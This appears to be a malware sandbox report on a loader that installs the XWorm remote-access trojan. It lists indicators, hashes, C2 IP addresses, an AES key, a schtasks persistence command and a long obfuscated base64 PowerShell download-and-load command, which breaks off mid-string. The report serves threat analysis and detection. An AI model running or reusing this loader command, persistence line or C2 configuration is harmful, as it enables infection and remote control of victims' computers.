File name:

SecuriteInfo.com.Trojan.DownLoader48.43240.12313.2666

Full analysis: https://app.any.run/tasks/a6bc32d9-68ea-42d0-b4b3-25f1e4f8dcd0
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: June 21, 2025, 13:28:15
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
stegocampaign
github
auto-reg
auto-startup
remote
xworm
payload
loader
reverseloader
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (GUI) x86-64, for MS Windows, 6 sections
MD5:

FEF6E5E8B1E932147A7268C35F478D42

SHA1:

478B6FC625D98EBE374400312BCEA9B653085FDF

SHA256:

4E40A4F48A6143FF7AB5B87CB65BABBA42C5704E65F0002109249F1B50194BE7

SSDEEP:

1536:S9uTLiOXr95yRfHRewmwwhn19Ghak1Gn5dGgS9rDYGVoJ3D+:8Giyr95MfxewjwVGkk1Q5cgSlDjOD+

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Changes powershell execution policy

      • wscript.exe (PID: 6176)
      • powershell.exe (PID: 3092)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 3092)
      • powershell.exe (PID: 4120)

    • STEGOCAMPAIGN has been detected

      • powershell.exe (PID: 4120)

    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 4120)

    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 4120)

    • Uses Task Scheduler to run other applications

      • Client.exe (PID: 6508)
      • XClient.exe (PID: 3632)

    • Changes the autorun value in the registry

      • Client.exe (PID: 6508)
      • XClient.exe (PID: 3632)

    • XWORM has been detected (YARA)

      • XClient.exe (PID: 3632)
      • Client.exe (PID: 6508)

    • Create files in the Startup directory

      • XClient.exe (PID: 3632)
      • Client.exe (PID: 6508)

    • XWORM has been detected (SURICATA)

      • Client.exe (PID: 6508)
      • XClient.exe (PID: 3632)

    • REVERSELOADER has been detected (SURICATA)

      • powershell.exe (PID: 4120)

  • SUSPICIOUS

    • Process drops legitimate windows executable

      • SecuriteInfo.com.Trojan.DownLoader48.43240.12313.2666.exe (PID: 6004)

    • Starts a Microsoft application from unusual location

      • SecuriteInfo.com.Trojan.DownLoader48.43240.12313.2666.exe (PID: 6004)

    • Starts CMD.EXE for commands execution

      • SecuriteInfo.com.Trojan.DownLoader48.43240.12313.2666.exe (PID: 6004)

    • The process executes VB scripts

      • cmd.exe (PID: 7100)

    • Accesses computer name via WMI (SCRIPT)

      • wscript.exe (PID: 6176)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 6176)

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 6176)
      • powershell.exe (PID: 3092)

    • Probably obfuscated PowerShell command line is found

      • wscript.exe (PID: 6176)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 3092)
      • powershell.exe (PID: 4120)

    • Probably download files using WebClient

      • powershell.exe (PID: 3092)

    • Found IP address in command line

      • powershell.exe (PID: 4120)

    • Application launched itself

      • powershell.exe (PID: 3092)

    • Get information on the list of running processes

      • powershell.exe (PID: 3092)

    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 4120)

    • Executable content was dropped or overwritten

      • MSBuild.exe (PID: 3640)
      • XClient.exe (PID: 3632)

    • Uses TASKKILL.EXE to kill process

      • powershell.exe (PID: 4120)

    • Reads security settings of Internet Explorer

      • MSBuild.exe (PID: 3640)
      • XClient.exe (PID: 3632)
      • Client.exe (PID: 6508)

    • Connects to the server without a host name

      • powershell.exe (PID: 4120)

    • Reads the date of Windows installation

      • Client.exe (PID: 6508)
      • XClient.exe (PID: 3632)

    • Connects to unusual port

      • XClient.exe (PID: 3632)
      • Client.exe (PID: 6508)

    • Contacting a server suspected of hosting an CnC

      • Client.exe (PID: 6508)
      • XClient.exe (PID: 3632)

    • The process executes via Task Scheduler

      • Client.exe (PID: 2280)
      • Client.exe (PID: 1760)
      • salie.exe (PID: 1520)
      • salie.exe (PID: 5876)

  • INFO

    • Checks supported languages

      • SecuriteInfo.com.Trojan.DownLoader48.43240.12313.2666.exe (PID: 6004)
      • MSBuild.exe (PID: 3640)
      • XClient.exe (PID: 3632)
      • Client.exe (PID: 6508)
      • Client.exe (PID: 5908)
      • salie.exe (PID: 2808)
      • salie.exe (PID: 1520)
      • Client.exe (PID: 1760)
      • salie.exe (PID: 5876)
      • Client.exe (PID: 2280)

    • Create files in a temporary directory

      • SecuriteInfo.com.Trojan.DownLoader48.43240.12313.2666.exe (PID: 6004)
      • powershell.exe (PID: 4120)

    • The sample compiled with english language support

      • SecuriteInfo.com.Trojan.DownLoader48.43240.12313.2666.exe (PID: 6004)

    • Reads the computer name

      • SecuriteInfo.com.Trojan.DownLoader48.43240.12313.2666.exe (PID: 6004)
      • MSBuild.exe (PID: 3640)
      • XClient.exe (PID: 3632)
      • Client.exe (PID: 6508)
      • Client.exe (PID: 5908)
      • salie.exe (PID: 2808)
      • Client.exe (PID: 2280)
      • salie.exe (PID: 1520)
      • Client.exe (PID: 1760)
      • salie.exe (PID: 5876)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 3092)

    • Gets a random number, or selects objects randomly from a collection (POWERSHELL)

      • powershell.exe (PID: 3092)

    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 3092)

    • Reads the software policy settings

      • powershell.exe (PID: 4120)
      • slui.exe (PID: 3944)

    • Disables trace logs

      • powershell.exe (PID: 4120)

    • Reads security settings of Internet Explorer

      • powershell.exe (PID: 4120)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 4120)

    • Checks proxy server information

      • powershell.exe (PID: 4120)
      • slui.exe (PID: 3944)

    • Process checks computer location settings

      • MSBuild.exe (PID: 3640)
      • Client.exe (PID: 6508)
      • XClient.exe (PID: 3632)

    • Reads the machine GUID from the registry

      • MSBuild.exe (PID: 3640)
      • XClient.exe (PID: 3632)
      • Client.exe (PID: 6508)
      • salie.exe (PID: 2808)
      • Client.exe (PID: 5908)
      • Client.exe (PID: 2280)
      • salie.exe (PID: 1520)
      • Client.exe (PID: 1760)
      • salie.exe (PID: 5876)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 4120)

    • Launching a file from a Registry key

      • Client.exe (PID: 6508)
      • XClient.exe (PID: 3632)

    • Creates files or folders in the user directory

      • Client.exe (PID: 6508)
      • MSBuild.exe (PID: 3640)
      • XClient.exe (PID: 3632)

    • Manual execution by a user

      • Client.exe (PID: 5908)
      • salie.exe (PID: 2808)

    • Launching a file from the Startup directory

      • Client.exe (PID: 6508)
      • XClient.exe (PID: 3632)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

XWorm

(PID) Process(3632) XClient.exe
C243.155.4.35,150.109.120.102,43.159.199.184:15151
Keys
AES<123456789>
Options
Splitter<Xwormmm>
Sleep time3
USB drop name5.27
Mutexd4nLpH0cVSGVUbml
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2062:07:25 12:18:00+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 14.2
CodeSize: 31744
InitializedDataSize: 65024
UninitializedDataSize: -
EntryPoint: 0x8200
OSVersion: 10
ImageVersion: 10
SubsystemVersion: 6
Subsystem: Windows GUI
FileVersionNumber: 11.0.19041.1
ProductVersionNumber: 11.0.19041.1
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Windows NT 32-bit
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Unicode
CompanyName: Microsoft Corporation
FileDescription: Win32 Cabinet Self-Extractor
FileVersion: 11.00.19041.1 (WinBuild.160101.0800)
InternalName: Wextract
LegalCopyright: © Microsoft Corporation. All rights reserved.
OriginalFileName: WEXTRACT.EXE .MUI
ProductName: Internet Explorer
ProductVersion: 11.00.19041.1
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
163
Monitored processes
27
Malicious processes
8
Suspicious processes
0

Behavior graph

Click at the process to see the details
start securiteinfo.com.trojan.downloader48.43240.12313.2666.exe no specs cmd.exe no specs conhost.exe no specs wscript.exe no specs powershell.exe no specs conhost.exe no specs #STEGOCAMPAIGN powershell.exe msbuild.exe no specs taskkill.exe no specs conhost.exe no specs msbuild.exe no specs taskkill.exe no specs conhost.exe no specs msbuild.exe #XWORM xclient.exe #XWORM client.exe schtasks.exe no specs conhost.exe no specs schtasks.exe no specs conhost.exe no specs client.exe no specs salie.exe no specs client.exe no specs salie.exe no specs slui.exe client.exe no specs salie.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
760"taskkill" /PID 2280 /FC:\Windows\System32\taskkill.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Terminates Processes
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\taskkill.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
1080"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
MSBuild.exe
Exit code:
1
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
1472"C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "Client" /tr "C:\Users\admin\AppData\Roaming\Client.exe"C:\Windows\System32\schtasks.exeClient.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1520"C:\Users\admin\AppData\Roaming\salie.exe"C:\Users\admin\AppData\Roaming\salie.exesvchost.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Exit code:
0
Version:
1.0.0.0
Modules
Images
c:\users\admin\appdata\roaming\salie.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
1760"C:\Users\admin\AppData\Roaming\Client.exe"C:\Users\admin\AppData\Roaming\Client.exesvchost.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Exit code:
0
Version:
1.0.0.0
Modules
Images
c:\users\admin\appdata\roaming\client.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
2280"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
MSBuild.exe
Exit code:
1
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
2280"C:\Users\admin\AppData\Roaming\Client.exe"C:\Users\admin\AppData\Roaming\Client.exesvchost.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Exit code:
0
Version:
1.0.0.0
Modules
Images
c:\users\admin\appdata\roaming\client.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
2696\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2808C:\Users\admin\AppData\Roaming\salie.exeC:\Users\admin\AppData\Roaming\salie.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Exit code:
0
Version:
1.0.0.0
Modules
Images
c:\users\admin\appdata\roaming\salie.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
3092"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ddsdgo ='WwBOd@GUd@dd@d@ud@FMd@ZQByd@HYd@aQBjd@GUd@Ud@Bvd@Gkd@bgB0d@E0d@YQBud@GEd@ZwBld@HId@XQd@6d@Dod@UwBld@GMd@dQByd@Gkd@dd@B5d@Fd@d@cgBvd@HQd@bwBjd@G8d@bd@d@gd@D0d@Id@Bbd@E4d@ZQB0d@C4d@UwBld@GMd@dQByd@Gkd@dd@B5d@Fd@d@cgBvd@HQd@bwBjd@G8d@bd@BUd@Hkd@cd@Bld@F0d@Ogd@6d@FQd@bd@Bzd@DEd@Mgd@Nd@d@od@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@ZgB1d@G4d@YwB0d@Gkd@bwBud@Cd@d@Rd@Bvd@Hcd@bgBsd@G8d@YQBkd@EQd@YQB0d@GEd@RgByd@G8d@bQBMd@Gkd@bgBrd@HMd@Id@B7d@Cd@d@cd@Bhd@HId@YQBtd@Cd@d@Kd@Bbd@HMd@dd@Byd@Gkd@bgBnd@Fsd@XQBdd@CQd@bd@Bpd@G4d@awBzd@Ckd@Id@d@Nd@d@od@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Jd@B3d@GUd@YgBDd@Gwd@aQBld@G4d@dd@d@gd@D0d@Id@BOd@GUd@dwd@td@E8d@YgBqd@GUd@YwB0d@Cd@d@UwB5d@HMd@dd@Bld@G0d@LgBOd@GUd@dd@d@ud@Fcd@ZQBid@EMd@bd@Bpd@GUd@bgB0d@Dsd@Id@d@Nd@d@od@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Jd@Bzd@Ggd@dQBmd@GYd@bd@Bld@GQd@Td@Bpd@G4d@awBzd@Cd@d@PQd@gd@Ecd@ZQB0d@C0d@UgBhd@G4d@Zd@Bvd@G0d@Id@d@td@Ekd@bgBwd@HUd@dd@BPd@GId@agBld@GMd@dd@d@gd@CQd@bd@Bpd@G4d@awBzd@Cd@d@LQBDd@G8d@dQBud@HQd@Id@d@kd@Gwd@aQBud@Gsd@cwd@ud@Ewd@ZQBud@Gcd@dd@Bod@Dsd@Id@d@Nd@d@od@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@ZgBvd@HId@ZQBhd@GMd@ad@d@gd@Cgd@Jd@Bsd@Gkd@bgBrd@Cd@d@aQBud@Cd@d@Jd@Bzd@Ggd@dQBmd@GYd@bd@Bld@GQd@Td@Bpd@G4d@awBzd@Ckd@Id@B7d@Cd@d@dd@Byd@Hkd@Id@B7d@Cd@d@cgBld@HQd@dQByd@G4d@Id@d@kd@Hcd@ZQBid@EMd@bd@Bpd@GUd@bgB0d@C4d@Rd@Bvd@Hcd@bgBsd@G8d@YQBkd@EQd@YQB0d@GEd@Kd@d@kd@Gwd@aQBud@Gsd@KQd@gd@H0d@Id@Bjd@GEd@dd@Bjd@Ggd@Id@B7d@Cd@d@YwBvd@G4d@dd@Bpd@G4d@dQBld@Cd@d@fQd@gd@H0d@Owd@gd@d@0d@Cgd@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@Byd@GUd@dd@B1d@HId@bgd@gd@CQd@bgB1d@Gwd@bd@d@gd@H0d@Owd@gd@d@0d@Cgd@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@EId@eQB0d@GUd@cwd@gd@D0d@Id@d@nd@Ggd@dd@B0d@Ccd@Owd@Nd@d@od@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Jd@BCd@Hkd@dd@Bld@HMd@Mgd@gd@D0d@Id@d@nd@Hd@d@cwd@6d@C8d@Lwd@nd@Dsd@DQd@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@Gwd@ZgBzd@GQd@ZgBzd@GQd@Zwd@gd@D0d@Id@d@gd@CQd@QgB5d@HQd@ZQBzd@Cd@d@Kwd@kd@EId@eQB0d@GUd@cwd@yd@Dsd@DQd@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@CQd@bd@Bpd@G4d@awBzd@Cd@d@PQd@gd@Ed@d@Kd@d@od@CQd@bd@Bmd@HMd@Zd@Bmd@HMd@Zd@Bnd@Cd@d@Kwd@gd@Ccd@YgBpd@HQd@YgB1d@GMd@awBld@HQd@LgBvd@HId@Zwd@vd@Ggd@ZwBmd@God@ZgBnd@God@cwBmd@HMd@ZQBmd@C8d@cgBld@HQd@cgBld@Hcd@cQBld@C8d@cgBhd@Hcd@Lwd@yd@DEd@YQBkd@GEd@Nwd@wd@Dcd@Md@Bhd@GYd@Ngd@zd@Dcd@MQd@3d@GUd@YwBjd@GEd@Ngd@yd@GUd@YQd@wd@GId@Zd@Bjd@DYd@ZQd@3d@DMd@Mwd@yd@GId@NQBid@DQd@Ygd@wd@C8d@dd@Bld@HMd@dd@d@ud@God@cd@Bnd@D8d@MQd@zd@Dcd@MQd@xd@DMd@Jwd@pd@Cwd@Id@d@od@CQd@bd@Bmd@HMd@Zd@Bmd@HMd@Zd@Bnd@Cd@d@Kwd@gd@Ccd@cgBhd@Hcd@LgBnd@Gkd@dd@Bod@HUd@YgB1d@HMd@ZQByd@GMd@bwBud@HQd@ZQBud@HQd@LgBjd@G8d@bQd@vd@Gwd@dQBud@GEd@cgBkd@GUd@dgB2d@C8d@cd@Btd@G0d@LwByd@GUd@ZgBzd@C8d@ad@Bld@GEd@Zd@Bzd@C8d@bQBhd@Gkd@bgd@vd@HQd@ZQBzd@HQd@LgBqd@Hd@d@Zwd@/d@DEd@Mwd@3d@DEd@MQd@zd@Ccd@KQd@pd@Dsd@DQd@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Jd@Bpd@G0d@YQBnd@GUd@QgB5d@HQd@ZQBzd@Cd@d@PQd@gd@EQd@bwB3d@G4d@bd@Bvd@GEd@Zd@BEd@GEd@dd@Bhd@EYd@cgBvd@G0d@Td@Bpd@G4d@awBzd@Cd@d@Jd@Bsd@Gkd@bgBrd@HMd@Owd@Nd@d@od@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@Bpd@GYd@Id@d@od@CQd@aQBtd@GEd@ZwBld@EId@eQB0d@GUd@cwd@gd@C0d@bgBld@Cd@d@Jd@Bud@HUd@bd@Bsd@Ckd@Id@B7d@Cd@d@Jd@Bpd@G0d@YQBnd@GUd@Vd@Bld@Hgd@dd@d@gd@D0d@Id@Bbd@FMd@eQBzd@HQd@ZQBtd@C4d@Vd@Bld@Hgd@dd@d@ud@EUd@bgBjd@G8d@Zd@Bpd@G4d@ZwBdd@Dod@OgBVd@FQd@Rgd@4d@C4d@RwBld@HQd@UwB0d@HId@aQBud@Gcd@Kd@d@kd@Gkd@bQBhd@Gcd@ZQBCd@Hkd@dd@Bld@HMd@KQd@7d@d@0d@Cgd@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@CQd@cwB0d@GEd@cgB0d@EYd@bd@Bhd@Gcd@Id@d@9d@Cd@d@Jwd@8d@Dwd@QgBBd@FMd@RQd@2d@DQd@XwBTd@FQd@QQBSd@FQd@Pgd@+d@Ccd@Owd@gd@CQd@ZQBud@GQd@RgBsd@GEd@Zwd@gd@D0d@Id@d@nd@Dwd@Pd@BCd@EEd@UwBFd@DYd@Nd@Bfd@EUd@TgBEd@D4d@Pgd@nd@Dsd@Id@d@kd@HMd@dd@Bhd@HId@dd@BJd@G4d@Zd@Bld@Hgd@Id@d@9d@Cd@d@Jd@Bpd@G0d@YQBnd@GUd@Vd@Bld@Hgd@dd@d@ud@Ekd@bgBkd@GUd@ed@BPd@GYd@Kd@d@kd@HMd@dd@Bhd@HId@dd@BGd@Gwd@YQBnd@Ckd@Owd@gd@d@0d@Cgd@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@GUd@bgBkd@Ekd@bgBkd@GUd@ed@d@gd@D0d@Id@d@kd@Gkd@bQBhd@Gcd@ZQBUd@GUd@ed@B0d@C4d@SQBud@GQd@ZQB4d@E8d@Zgd@od@CQd@ZQBud@GQd@RgBsd@GEd@Zwd@pd@Dsd@DQd@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@aQBmd@Cd@d@Kd@d@kd@HMd@dd@Bhd@HId@dd@BJd@G4d@Zd@Bld@Hgd@Id@d@td@Gcd@ZQd@gd@Dd@d@Id@d@td@GEd@bgBkd@Cd@d@Jd@Bld@G4d@Zd@BJd@G4d@Zd@Bld@Hgd@Id@d@td@Gcd@dd@d@gd@CQd@cwB0d@GEd@cgB0d@Ekd@bgBkd@GUd@ed@d@pd@Cd@d@ewd@gd@CQd@cwB0d@GEd@cgB0d@Ekd@bgBkd@GUd@ed@d@gd@Csd@PQd@gd@CQd@cwB0d@GEd@cgB0d@EYd@bd@Bhd@Gcd@LgBMd@GUd@bgBnd@HQd@ad@d@7d@Cd@d@DQd@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@CQd@YgBhd@HMd@ZQd@2d@DQd@Td@Bld@G4d@ZwB0d@Ggd@ad@d@gd@D0d@Id@d@kd@GUd@bgBkd@Ekd@bgBkd@GUd@ed@d@gd@C0d@Id@d@kd@HMd@dd@Bhd@HId@dd@BJd@G4d@Zd@Bld@Hgd@Owd@Nd@d@od@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@GId@YQBzd@GUd@Ngd@0d@EMd@bwBtd@G0d@YQBud@GQd@Id@d@9d@Cd@d@Jd@Bpd@G0d@YQBnd@GUd@Vd@Bld@Hgd@dd@d@ud@FMd@dQBid@HMd@dd@Byd@Gkd@bgBnd@Cgd@Jd@Bzd@HQd@YQByd@HQd@SQBud@GQd@ZQB4d@Cwd@Id@d@kd@GId@YQBzd@GUd@Ngd@0d@Ewd@ZQBud@Gcd@dd@Bod@Ggd@KQd@7d@d@0d@Cgd@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Jd@Bld@G4d@Zd@BJd@G4d@Zd@Bld@Hgd@Id@d@9d@Cd@d@Jd@Bpd@G0d@YQBnd@GUd@Vd@Bld@Hgd@dd@d@ud@Ekd@bgBkd@GUd@ed@BPd@GYd@Kd@d@kd@GUd@bgBkd@EYd@bd@Bhd@Gcd@KQd@7d@d@0d@Cgd@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@CQd@YwBvd@G0d@bQBhd@G4d@Zd@BCd@Hkd@dd@Bld@HMd@Id@d@9d@Cd@d@WwBTd@Hkd@cwB0d@GUd@bQd@ud@EMd@bwBud@HYd@ZQByd@HQd@XQd@6d@Dod@RgByd@G8d@bQBCd@GEd@cwBld@DYd@Nd@BTd@HQd@cgBpd@G4d@Zwd@od@CQd@YgBhd@HMd@ZQd@2d@DQd@QwBvd@G0d@bQBhd@G4d@Zd@d@pd@Dsd@Id@d@gd@Cd@d@Jd@Bld@G4d@Zd@BJd@G4d@Zd@Bld@Hgd@Id@d@9d@Cd@d@Jd@Bpd@G0d@YQBnd@GUd@Vd@Bld@Hgd@dd@d@ud@Ekd@bgBkd@GUd@ed@BPd@GYd@Kd@d@kd@GUd@bgBkd@EYd@bd@Bhd@Gcd@KQd@7d@Cd@d@Id@d@gd@CQd@ZQBud@GQd@SQBud@GQd@ZQB4d@Cd@d@PQd@gd@CQd@aQBtd@GEd@ZwBld@FQd@ZQB4d@HQd@LgBJd@G4d@Zd@Bld@Hgd@TwBmd@Cgd@Jd@Bld@G4d@Zd@BGd@Gwd@YQBnd@Ckd@Owd@Nd@d@od@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Jd@Bsd@G8d@YQBkd@GUd@Zd@BBd@HMd@cwBld@G0d@YgBsd@Hkd@Id@d@9d@Cd@d@WwBTd@Hkd@cwB0d@GUd@bQd@ud@FId@ZQBmd@Gwd@ZQBjd@HQd@aQBvd@G4d@LgBBd@HMd@cwBld@G0d@YgBsd@Hkd@XQd@6d@Dod@Td@Bvd@GEd@Zd@d@od@CQd@YwBvd@G0d@bQBhd@G4d@Zd@BCd@Hkd@dd@Bld@HMd@KQd@7d@d@0d@Cgd@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Ecd@ZQB0d@C0d@Ud@Byd@G8d@YwBld@HMd@cwd@gd@Hwd@Id@BTd@G8d@cgB0d@C0d@TwBid@God@ZQBjd@HQd@Id@BDd@Fd@d@VQd@gd@C0d@Rd@Bld@HMd@YwBld@G4d@Zd@Bpd@G4d@Zwd@gd@Hwd@Id@BTd@GUd@bd@Bld@GMd@dd@d@td@E8d@YgBqd@GUd@YwB0d@Cd@d@LQBGd@Gkd@cgBzd@HQd@Id@d@1d@Cd@d@fd@d@gd@EYd@bwByd@G0d@YQB0d@C0d@Vd@Bhd@GId@bd@Bld@Cd@d@TgBhd@G0d@ZQd@sd@EMd@Ud@BVd@d@0d@Cgd@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@HQd@eQBwd@GUd@Id@d@9d@Cd@d@Jd@Bsd@G8d@YQBkd@GUd@Zd@BBd@HMd@cwBld@G0d@YgBsd@Hkd@LgBHd@GUd@dd@BUd@Hkd@cd@Bld@Cgd@JwB0d@GUd@cwB0d@Hd@d@bwB3d@GUd@cgBzd@Ggd@ZQBsd@Gwd@LgBId@G8d@YQBhd@GEd@YQBhd@GEd@cwBkd@G0d@ZQd@nd@Ckd@Owd@Nd@d@od@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@DQd@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@RwBld@HQd@LQBQd@HId@bwBjd@GUd@cwBzd@Cd@d@fd@d@gd@FMd@bwByd@HQd@LQBPd@GId@agBld@GMd@dd@d@gd@EMd@Ud@BVd@Cd@d@LQBEd@GUd@cwBjd@GUd@bgBkd@Gkd@bgBnd@Cd@d@fd@d@gd@FMd@ZQBsd@GUd@YwB0d@C0d@TwBid@God@ZQBjd@HQd@Id@d@td@EYd@aQByd@HMd@dd@d@gd@DUd@Id@B8d@Cd@d@RgBvd@HId@bQBhd@HQd@LQBUd@GEd@YgBsd@GUd@Id@BOd@GEd@bQBld@Cwd@QwBQd@FUd@DQd@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@CQd@bQBld@HQd@ad@Bvd@GQd@Id@d@9d@Cd@d@Jd@B0d@Hkd@cd@B